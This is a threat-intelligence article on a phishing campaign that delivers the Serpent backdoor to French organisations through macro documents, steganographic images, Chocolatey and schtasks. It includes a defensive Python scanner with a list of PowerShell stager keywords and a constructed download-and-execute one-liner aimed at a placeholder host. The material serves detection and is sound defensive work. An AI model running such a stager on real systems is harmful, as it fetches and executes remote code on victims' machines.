A new email campaign attacking French entities is using a highly evasive attack chain. The phishing campaign is installing a new backdoor named Serpent. 

Diving into details

An unknown and likely sophisticated threat actor is combining open-source software, a detection-bypass technique, and steganography into one attack chain against French government agencies, large construction firms, and real estate companies. Rather than exploiting a vulnerability, the actor abuses Chocolatey, a popular and legitimate Windows package manager, as a trusted installer: it pulls in Python and the dependencies that the Serpent backdoor needs to run. Chocolatey itself is not compromised; it is simply being used for a purpose its authors never intended.

Attack chain

  • The phishing email impersonates the EU's General Data Protection Regulation (GDPR). It carries a macro-laced Microsoft Word document.
  • Once the document is opened and macros are enabled, the malicious macro fetches an image of Swiper the Fox from Dora the Explorer.
  • The image hides a PowerShell script via steganography; the macro extracts and executes it. Because the malicious code lives in an image rather than in the document, signature-based scanning of the attachment does not see it.
  • That PowerShell script installs Chocolatey and uses it to install Python, then downloads a second steganographic image that carries the Python-based Serpent backdoor.
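The page does not describe how the script is encoded inside the image. The following is an added example, not code from the article or from the researchers' analysis: it checks for the simplest and most common variant of this trick, a payload appended after the image's end-of-file marker, which viewers silently ignore. The sample JPEG bytes, the PowerShell one-liner and the hostname `example.invalid` are all constructed for the demonstration.

```python
"""
Added example (not from the article): flag images that carry data after their
end-of-image marker and look for PowerShell stager keywords in that data.
The sample image, the stager text and the hostname below are constructed.
"""
import base64
import re
from typing import Optional

# End-of-image markers. Bytes after them are never needed to render the image,
# so an image viewer (and a casual reviewer) ignores whatever is appended there.
JPEG_SOI, JPEG_EOI = b"\xff\xd8", b"\xff\xd9"
PNG_SIG, PNG_IEND = b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"  # chunk type + fixed CRC

# Tokens that commonly appear in PowerShell download-and-execute stagers.
# 'schtasks' is included because the article notes the actor proxies execution through it.
POWERSHELL_HINTS = re.compile(
    rb"(Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|FromBase64String|"
    rb"-EncodedCommand|Start-Process|schtasks)",
    re.IGNORECASE,
)


def trailing_data(blob: bytes) -> Optional[bytes]:
    """Return bytes found after the image's end marker, or None if the blob is
    not a JPEG/PNG or nothing follows the marker."""
    if blob.startswith(JPEG_SOI):
        # An EXIF thumbnail embedded in the file has its own EOI, so take the last
        # one. This is reliable as long as the appended payload is text (ASCII and
        # base64 never contain 0xFF).
        end = blob.rfind(JPEG_EOI)
        marker_len = len(JPEG_EOI)
    elif blob.startswith(PNG_SIG):
        # Match the full 8-byte "IEND" + CRC so a chance "IEND" inside pixel data
        # is not mistaken for the end of the file.
        end = blob.find(PNG_IEND)
        marker_len = len(PNG_IEND)
    else:
        return None
    if end < 0:
        return None
    tail = blob[end + marker_len:]
    return tail or None


def decode_payload(tail: bytes) -> bytes:
    """Best-effort decode: strip whitespace and try strict base64, otherwise
    return the raw bytes (a plain-text script is also a hit)."""
    compact = re.sub(rb"\s+", b"", tail)
    try:
        return base64.b64decode(compact, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return tail


def scan_image(blob: bytes) -> dict:
    """Summarise what, if anything, is hidden after the image data."""
    tail = trailing_data(blob)
    if tail is None:
        return {"trailing_bytes": 0, "powershell_hints": []}
    payload = decode_payload(tail)
    # -EncodedCommand payloads are UTF-16LE; check both readings of the bytes.
    views = [
        payload,
        payload.decode("utf-16-le", errors="ignore").encode("ascii", "ignore"),
    ]
    hints = sorted({
        m.group(0).decode("ascii", "ignore").lower()
        for view in views
        for m in POWERSHELL_HINTS.finditer(view)
    })
    return {"trailing_bytes": len(tail), "powershell_hints": hints}


# --- constructed sample: a minimal JPEG (SOI, empty JFIF APP0 segment, EOI) ---
CLEAN_JPEG = (
    JPEG_SOI
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + JPEG_EOI
)
# Constructed stager text; example.invalid is a placeholder, not a real host.
STAGER = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
TROJANED_JPEG = CLEAN_JPEG + base64.b64encode(STAGER)

if __name__ == "__main__":
    print("clean    :", scan_image(CLEAN_JPEG))
    print("trojaned :", scan_image(TROJANED_JPEG))
```

This only catches appended payloads; a script hidden in pixel data (for example in the least significant bits) would pass this check, so treat a clean result as "no trailing data", not as "no steganography". The practical signal in a fleet is the combination: an Office process fetching an image, followed by PowerShell, Chocolatey or Python activity from the same user session.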

Why this matters

Although the ultimate goal of the campaign has not yet been determined, a successful infection gives the threat actor broad control. Serpent polls the attacker's C2 server for commands and executes them on the victim device. Because it can run arbitrary commands, the operators can download additional malware, gain full access to the infected host, and open reverse shells.

New threat actor?

Apart from abusing Chocolatey and installing Serpent, the attackers use a previously undocumented detection-bypass technique: signed binary proxy execution through schtasks.exe, the legitimate, Microsoft-signed Windows task scheduler utility. Running the payload under a trusted system binary makes the execution look like routine scheduled-task activity to controls that trust signed code. Taken together, these unusual tactics and techniques suggest a new, capable group; no link to any known threat actor has been established.

The bottom line

The TTPs of the threat actor point toward espionage, with host control, data access, and installation of further malware as the primary objectives. Chocolatey has stated that it is unaware of its software being abused and is looking into it. Since the techniques described above are unusual, organizations should tune defenses to the observed chain: block or restrict macros in documents that arrive by email, watch for Office processes spawning PowerShell, alert on unexpected Chocolatey or Python installations on user workstations, and review scheduled tasks created by PowerShell or Office processes rather than by administrators.

Cyware Publisher